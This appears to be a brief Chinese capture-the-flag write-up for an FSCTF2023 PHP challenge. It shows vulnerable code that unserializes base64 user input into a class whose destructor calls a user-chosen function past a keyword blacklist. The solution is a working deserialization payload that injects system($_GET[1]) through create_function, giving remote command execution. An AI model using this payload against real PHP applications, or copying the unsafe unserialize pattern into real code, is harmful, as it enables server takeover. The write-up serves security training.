题目
<?php
class Noteasy
{
protected $param1;
protected $param2;
function __destruct()
{
$a = $this->param1;
$b = $this->param2;
if (preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) {
die('this param is error!');
} else {
$a('', $b);
}
}
}
if (!isset($_GET['file'])) {
show_source('index.php');
echo "Hi!Welcome to FSCTF2023!";
} else {
$file = base64_decode($_GET['file']);
unserialize($file);
}
一眼丁真,create_function的利用。
class Noteasy
{
protected $param1 = "create_function";
protected $param2 = "};system(\$_GET[1]);//";
function __destruct()
{
$a = $this->param1;
$b = $this->param2;
if (preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) {
die('this param is error!');
} else {
$a('', $b);
}
}
}
echo(base64_encode(serialize(new Noteasy())));